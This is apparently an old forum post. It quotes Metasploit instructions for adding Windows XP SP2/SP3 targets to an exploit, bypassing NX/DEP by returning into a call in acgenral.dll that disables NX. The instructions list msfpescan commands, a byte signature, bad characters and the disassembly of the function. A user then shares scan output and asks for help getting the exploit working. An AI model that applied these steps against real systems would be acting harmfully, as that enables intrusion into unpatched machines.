
04.12.2008, 12:17
*** WINDOWS XP SP2/SP3 TARGETS ***
This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to
add new targets.
If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
DisableNX elements of the target hash.
If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
First obtain the value for the Ret element of the hash with the following command:
$ msfpescan -j esi acgenral.dll
Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
Next, find the location of the function we use to disable NX. Use the following command:
$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
This address should be placed into the DisableNX element of the target hash.
The Scratch element of 0x00020408 should work on all versions of Windows.
The actual function we use to disable NX looks like this:
push 4
lea eax, [ebp+arg_0]
push eax
push 22h
push 0FFFFFFFFh
mov [ebp+arg_0], 2
call ds:__imp__NtSetInformationProcess@16
How do I use this?
I have a Windows box on which the exploit does not work.
I did everything according to the instructions.
I got:
$ msfpescan -j esi acgenral.dll
[c:\m\acgenral.dll]
$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
[c:\m\acgenral.dll]
0x6fe217c2 6a048d4508506a226aff
What do I do next?